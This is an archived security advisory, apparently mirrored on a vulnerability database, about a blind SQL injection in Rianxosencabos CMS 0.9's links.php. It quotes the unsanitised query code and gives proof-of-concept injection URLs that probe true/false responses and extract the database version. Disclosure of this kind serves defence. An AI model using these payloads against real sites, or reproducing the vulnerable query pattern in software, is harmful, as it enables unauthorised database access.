Lucene search
K

rianxosencabos-sql.txt

🗓️ 01 Oct 2008 00:00:00Reported by ka0xType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Rianxosencabos CMS 0.9 has a remote SQL injection vulnerability in links.php script.

Code
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
/ Script: Rianxosencabos  
/ Version: 0.9  
/ File affected: scripts/links.php  
/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz  
  
  
ka0x <ka0x01 [at] gmail [dot] com>  
D.O.M Labs - Security Researchers  
- www.domlabs.org  
  
Vuln code:  
  
-----  
88: function visita($id) {  
93: $resultado=$bd->consulta("SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1");  
....  
  
112: if ($_GET['id']) {  
113: links::visita($_GET['id'])  
-----  
  
  
Proof of Concept:  
  
http://[host]/[cms]/?s=links&id=1 and 1=1 -> True  
http://[host]/[cms]/?s=links&id=1 and 1=0 -> False  
http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52  
  
  
__END__  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
23